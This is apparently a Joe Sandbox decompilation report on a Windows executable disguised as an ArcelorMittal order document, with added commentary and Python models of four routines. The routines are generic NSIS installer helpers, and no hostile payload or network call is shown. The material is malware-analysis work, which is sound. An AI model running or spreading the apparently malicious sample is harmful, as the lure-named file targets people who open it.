                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                • Instruction ID: dd95526c2c69af2e2475994b1a4b7019860870cbffabe27cf4c45e442f77114e
                                                • Opcode Fuzzy Hash: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                • Instruction Fuzzy Hash: 80015A7190060CAFEF219F25DD80FAB3A26EB85354F108136FA047E2D1C77A8C919E6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004037E6() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x79ff04; // 0x87fa28   head of a singly linked list of loaded modules
                                                				_t3 = E004037CB(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;                // next pointer is the first field of the node
                                                						FreeLibrary( *(_t6 + 8));   // HMODULE stored at node + 8
                                                						_t3 = GlobalFree(_t6);      // the node itself was GlobalAlloc'd
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x79ff04 =  *0x79ff04 & 0x00000000;   // clear the list head
                                                				return _t3;                             // returns the last GlobalFree result, not a status
                                                			}
                                                Instruction addresses (one per decompiled line): 0x004037e7, 0x004037ef, 0x004037f6, 0x004037f9, 0x004037f9, 0x004037fb, 0x00403800, 0x00403807, 0x0040380d, 0x00403811, 0x00403812, 0x0040381a

                                                APIs
                                                • FreeLibrary.KERNEL32(?,772EFAA0,00000000,C:\Users\user~1\AppData\Local\Temp\,004037BE,004035D3,?), ref: 00403800
                                                • GlobalFree.KERNEL32 ref: 00403807
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 1100898210-2382934351
                                                • Opcode ID: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                • Instruction ID: 7b5e820bad8908d6e9c5a6129ef56ed4de620d6e951f9557df5b5d2d3b1225d2
                                                • Opcode Fuzzy Hash: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                • Instruction Fuzzy Hash: 90E08C334115205BC6211F14AA04B2A76BC6F49F22F19802FF880BB2608B781C424AC8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00405A32(WCHAR* _a4) {                 // split a path at its last backslash
                                                				WCHAR* _t5;
                                                				WCHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				_t5 =  &(_t7[lstrlenW(_t7)]);       // start at the terminating NUL
                                                				while( *_t5 != 0x5c) {              // walk backwards until a '\\' is found
                                                					_push(_t5);
                                                					_push(_t7);
                                                					_t5 = CharPrevW();                // CharPrevW(_t7, _t5), honouring surrogate pairs
                                                					if(_t5 > _t7) {
                                                						continue;
                                                					}
                                                					break;                            // reached the first character without a '\\'
                                                				}
                                                				 *_t5 =  *_t5 & 0x00000000;         // cut the string here; with no backslash this zeroes the first character
                                                				return  &(_t5[1]);                  // pointer to the file-name part after the cut
                                                			}
                                                Instruction addresses (one per decompiled line; 0x00000000 marks a jump-only line): 0x00405a33, 0x00405a3d, 0x00405a40, 0x00405a46, 0x00405a47, 0x00405a48, 0x00405a50, 0x00000000, 0x00000000, 0x00000000, 0x00405a50, 0x00405a52, 0x00405a5a

                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A38
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3976562730
                                                • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                • Instruction ID: 324b1dc390856c450e544e32c4aad69d139446a74aa4c59c68e3560d72017bd2
                                                • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                • Instruction Fuzzy Hash: 1FD05EB2400D209AD322A704DC44EAF63A8FF51300786886AF941A61A1D7785C818EA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void* _v0;
                                                				void* _t17;
                                                				signed int _t19;
                                                				void* _t20;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t30;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t39;
                                                				signed int _t41;
                                                				void* _t42;
                                                				void* _t51;
                                                				void* _t52;
                                                				signed short* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t61;
                                                
                                                				 *0x1000406c = _a8;                  // count used to size the saved block
                                                				 *0x10004070 = _a16;                 // stored but not used in this function
                                                				 *0x10004074 = _a12;                 // the block that s/l save and restore
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);   // callback registration through the 4th pointer in _a20
                                                				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;   // _a8 * 40 bytes per saved block
                                                				_t17 = E10001243();                  // fetch the command string; freed at L16
                                                				_v0 = _t17;
                                                				_t52 = _t17;
                                                				if( *_t17 == 0) {
                                                					L16:
                                                					return GlobalFree(_t17);
                                                				} else {
                                                					do {
                                                						_t19 =  *_t52 & 0x0000ffff;      // current wide character
                                                						_t42 = 2;
                                                						_t54 = _t52 + _t42;              // position of the optional digit operand
                                                						_t61 = _t19 - 0x6c;              // compare with 'l'
                                                						if(_t61 > 0) {
                                                							_t20 = _t19 - 0x70;          // 'p'
                                                							if(_t20 == 0) {
                                                								L12:                     // p/P <digit>: push one entry of the block
                                                								_t52 = _t54 + _t42;      // consume the digit
                                                								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                								L13:
                                                								GlobalFree(_t24);
                                                								goto L14;
                                                							}
                                                							_t26 = _t20 - _t42;          // 'r'
                                                							if(_t26 == 0) {
                                                								L10:                     // r/R <digit>: pop into one entry of the block
                                                								_t52 =  &(_t54[1]);      // consume the digit
                                                								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                								goto L13;
                                                							}
                                                							L7:
                                                							if(_t26 == 1) {              // 's' here, 'S' when entered from below: save the whole block
                                                								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                								 *_t30 =  *0x10004040;   // link the new node in front of the list head
                                                								 *0x10004040 = _t30;
                                                								E10001563(_t30 + 4,  *0x10004074, _t41);   // copy the block into the node
                                                								_t59 = _t59 + 0xc;       // caller cleans the three cdecl arguments
                                                							}
                                                							goto L14;
                                                						}
                                                						if(_t61 == 0) {                  // 'l'
                                                							L17:                         // l/L: restore the block from the list head
                                                							_t33 =  *0x10004040;
                                                							if( *0x10004040 != 0) {
                                                								E10001563( *0x10004074, _t33 + 4, _t41);   // copy the node back over the block
                                                								_t59 = _t59 + 0xc;
                                                								_t36 =  *0x10004040;
                                                								GlobalFree(_t36);
                                                								 *0x10004040 =  *_t36;   // unlink; as decompiled the next pointer is read after GlobalFree
                                                							}
                                                							goto L14;
                                                						}
                                                						_t38 = _t19 - 0x4c;              // 'L'
                                                						if(_t38 == 0) {
                                                							goto L17;
                                                						}
                                                						_t39 = _t38 - 4;                 // 'P'
                                                						if(_t39 == 0) {
                                                							 *_t54 =  *_t54 + 0xa;       // digit + 10: addresses the second bank of ten
                                                							goto L12;
                                                						}
                                                						_t26 = _t39 - _t42;              // 'R'
                                                						if(_t26 == 0) {
                                                							 *_t54 =  *_t54 + 0xa;
                                                							goto L10;
                                                						}
                                                						goto L7;                         // 'S' when _t26 == 1; anything else falls to L14
                                                						L14:
                                                					} while ( *_t52 != 0);               // no check that a digit followed p/P/r/R; a trailing one steps past the terminator
                                                					_t17 = _v0;
                                                					goto L16;
                                                				}
                                                			}
                                                Instruction addresses (one per decompiled line; 0x00000000 marks a jump-only line): 0x100010e6, 0x100010f0, 0x100010ff, 0x1000110e, 0x10001119, 0x1000111c, 0x1000112b, 0x1000112f, 0x10001131, 0x100011d8, 0x100011de, 0x10001137, 0x10001138, 0x10001138, 0x1000113d, 0x1000113e, 0x10001140, 0x10001143, 0x1000120d, 0x10001210, 0x100011b0, 0x100011b6, 0x100011bf, 0x100011c4, 0x100011c7, 0x00000000, 0x100011c7, 0x10001212, 0x10001214, 0x10001196, 0x1000119d, 0x100011a5, 0x00000000, 0x100011a5, 0x10001161, 0x10001162, 0x1000116a, 0x10001177, 0x1000117f, 0x10001188, 0x1000118d, 0x1000118d, 0x00000000, 0x10001162, 0x10001149, 0x100011df, 0x100011df, 0x100011e6, 0x100011f3, 0x100011f8, 0x100011fb, 0x10001203, 0x10001205, 0x10001205, 0x00000000, 0x100011e6, 0x1000114f, 0x10001152, 0x00000000, 0x00000000, 0x10001158, 0x1000115b, 0x100011ac, 0x00000000, 0x100011ac, 0x1000115d, 0x1000115f, 0x10001192, 0x00000000, 0x10001192, 0x00000000, 0x100011c9, 0x100011c9, 0x100011d3, 0x00000000, 0x100011d7

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                Uniqueness

                                                Uniqueness Score: -1.00%
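The subtract-and-compare chain in E100010E1 above is a character switch over a command string: 0x6c and 0x4c are 'l' and 'L', 0x70 and 0x50 are 'p' and 'P', 0x72 and 0x52 are 'r' and 'R', and the two `_t26 == 1` cases are 's' and 'S'. p/P and r/R consume one following digit (`- 0x30`, with `+ 0xa` applied first for the upper-case forms), s/S copies the block at 0x10004074 onto a GlobalAlloc'd list, and l/L copies the list head back. The Python below is an added model of that dispatch, written for this page; it is not code from the report or from the sample. It re-walks the same comparisons so each branch label (L7, L10, L12, L17) can be checked against the listing, and it stands in for the external helpers E10001243, E10001272, E100012BA and E100012E1 with a plain Python list, which is an assumption about their roles (pop, push, read entry n, write entry n) based only on how they are called here. The opcode set (s/S, l/L, p/P n, r/R n) matches the syntax of the NSIS System plugin's Store command; that identification is an inference from the code, the report does not name the DLL at 0x10000000.

```python
# Added model of the opcode dispatch in E100010E1; not the sample's code.
# Branch labels in the comments refer to the decompiled listing above.
# Assumption: E10001243 (pop a string), E10001272 (push a string),
# E100012BA (read entry n) and E100012E1 (write entry n) behave like
# stack pop/push and list indexing; Python lists replace them here.

def classify(ch):
    """Re-walk the compare chain for one command character.

    Returns (branch, bias): branch is 'L12' (push one entry), 'L10' (pop into
    one entry), 'save' (L7 with _t26 == 1), 'L17' (load) or None (L14, no-op);
    bias is 10 when the listing does '*_t54 += 0xa' before jumping, i.e. for
    the upper-case P/R forms that address entries 10..19.
    """
    c = ord(ch)
    t61 = c - 0x6c                      # 'l'
    if t61 > 0:                         # everything above 'l'
        t20 = c - 0x70                  # 'p'
        if t20 == 0:
            return "L12", 0
        t26 = t20 - 2                   # 'r'
        if t26 == 0:
            return "L10", 0
        if t26 == 1:                    # 's'
            return "save", 0
        return None, 0
    if t61 == 0:                        # 'l'
        return "L17", 0
    t38 = c - 0x4c                      # 'L'
    if t38 == 0:
        return "L17", 0
    t39 = t38 - 4                       # 'P'
    if t39 == 0:
        return "L12", 10
    t26 = t39 - 2                       # 'R'
    if t26 == 0:
        return "L10", 10
    if t26 == 1:                        # 'S'
        return "save", 0
    return None, 0


def run(script, variables, stack):
    """Execute `script` over `variables` (a list of at least 20 entries) and `stack`.

    Mirrors the loop in E100010E1: p/P/r/R take the next character as a digit
    (value - 0x30, plus 10 for P/R); s/S push a copy of the whole block on a
    private LIFO (the GlobalAlloc'd list at 0x10004040 in the sample); l/L pop
    it back when the list is non-empty. Returns the trace of executed ops.
    """
    saved_blocks = []                   # stands in for the linked list
    trace = []
    i = 0
    while i < len(script):
        branch, bias = classify(script[i])
        i += 1
        if branch in ("L12", "L10"):
            if i >= len(script):
                # As decompiled, the sample does not check this: it would take
                # the terminating NUL as the digit and step past the end.
                raise ValueError("missing digit after %r" % script[i - 1])
            n = ord(script[i]) - 0x30 + bias
            i += 1
            if branch == "L12":
                stack.append(variables[n])          # E10001272(E100012BA(n))
                trace.append(("push", n))
            else:
                variables[n] = stack.pop()          # E100012E1(n, E10001243())
                trace.append(("pop", n))
        elif branch == "save":
            saved_blocks.append(list(variables))    # GlobalAlloc, copy, new head
            trace.append(("save", None))
        elif branch == "L17":
            if saved_blocks:                        # head != NULL
                variables[:] = saved_blocks.pop()   # copy back, GlobalFree, unlink
                trace.append(("load", None))
        else:
            trace.append(("skip", script[i - 1]))   # L14: unknown character ignored
    return trace
```

Feeding `run("sp3P4r0l", vars, stack)` a 20-entry list shows the two banks: `p3` pushes entry 3, `P4` pushes entry 14, `r0` pops into entry 0, and the trailing `l` undoes everything the `s` snapshot preceded. Characters that fall through every compare (for example 'q' or 'Q') reach L14 and are skipped, exactly as in the listing.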

                                                C-Code - Quality: 100%
                                                			E00405B6C(void* __ecx, CHAR* _a4, CHAR* _a8) {   // case-insensitive search for _a8 inside _a4
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;                                  // needle length
                                                				while(lstrlenA(_t27) >= _v8) {               // stop once the remaining haystack is shorter than the needle
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;   // temporarily terminate the haystack after needle-length bytes
                                                					_t15 = lstrcmpiA(_t27, _a8);             // compare that window case-insensitively
                                                					_t27[_v8] =  *(_t14 + _t27);             // restore; as decompiled this reads back the byte just zeroed, so the register holding the saved byte was probably lost
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;                         // match: return the pointer into the haystack
                                                					} else {
                                                						_t27 = CharNextA(_t27);              // advance one (possibly multi-byte) character
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;                                    // not found
                                                				goto L5;
                                                			}
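Read literally, the restore line in E00405B6C writes back a byte that the previous statement has already zeroed, which would leave the haystack truncated after the first compare and make the loop exit on the next lstrlenA check. A save-and-restore through a register is the obvious intended behaviour. The Python below is an added example for this page, not code from the report or the sample: it models both readings byte for byte on a NUL-terminated buffer so the difference can be observed. lstrcmpiA is approximated by ASCII case folding and CharNextA by a single-byte step, both assumptions; the sample text is constructed and only borrows the `[Rename]` marker that the APIs list shows in the argument context of the call from 00405E4D.

```python
# Added example; not the sample's code. Two readings of E00405B6C on a
# NUL-terminated bytearray so lstrlenA semantics can be mimicked.
# Assumptions: lstrcmpiA ~ ASCII case folding, CharNextA ~ one byte.

def c_strlen(buf, off):
    """lstrlenA: number of bytes from off up to the first NUL."""
    return buf.index(0, off) - off


def strstri_decompiled(buf, needle):
    """Literal reading of the listing: the restore writes back the zeroed byte.

    Mutates buf exactly as the decompiled code would. Returns the match offset
    or None.
    """
    n = len(needle)
    pos = 0
    while c_strlen(buf, pos) >= n:
        buf[pos + n] = 0                                    # *(_t14 + _t27) &= 0
        equal = buf[pos:pos + n].lower() == needle.lower()  # lstrcmpiA(_t27, _a8) == 0
        buf[pos + n] = buf[pos + n]                         # _t27[_v8] = *(_t14 + _t27): still 0
        if equal:
            return pos
        pos += 1                                            # CharNextA
    return None


def strstri_intended(buf, needle):
    """Same loop with the byte saved before the compare and put back after it."""
    n = len(needle)
    pos = 0
    while c_strlen(buf, pos) >= n:
        saved = buf[pos + n]
        buf[pos + n] = 0
        equal = buf[pos:pos + n].lower() == needle.lower()
        buf[pos + n] = saved
        if equal:
            return pos
        pos += 1
    return None


# Constructed sample buffer: INI-style text with the [Rename] marker from the
# APIs list, followed by a NUL terminator as lstrlenA expects.
SAMPLE = b"[Options]\r\n[Rename]\r\nold.tmp=new.exe\r\n\x00"


def compare_readings(needle=b"[rename]"):
    """Run both readings on fresh copies of SAMPLE; returns (intended, decompiled)."""
    return (strstri_intended(bytearray(SAMPLE), needle),
            strstri_decompiled(bytearray(SAMPLE), needle))
```

`compare_readings()` returns `(11, None)`: the literal reading can only ever match at offset 0 and leaves the caller's buffer cut to eight bytes, so the instruction at 00405b9f (the address the listing assigns to the restore line) is worth checking in the disassembly before relying on the 100% quality figure for this function.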
                                                Instruction addresses (one per decompiled line; 0x00000000 marks a jump-only line): 0x00405b7c, 0x00405b7e, 0x00405b81, 0x00405bad, 0x00405b86, 0x00405b8f, 0x00405b94, 0x00405b9f, 0x00405ba2, 0x00405bbe, 0x00405ba4, 0x00405bab, 0x00000000, 0x00405bab, 0x00405bb7, 0x00405bbb, 0x00405bbb, 0x00405bb5, 0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B94
                                                • CharNextA.USER32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA5
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                • Instruction ID: 7563504597b604d9a211119aa68f0a7f164f23f923bb21cff999b965ed3bd4a6
                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                • Instruction Fuzzy Hash: DCF0C231105818AFD7029FA5DD0099FBBB8EF55250B2540A9E840F7210D674FE019B68
Uniqueness
• Uniqueness Score: -1.00%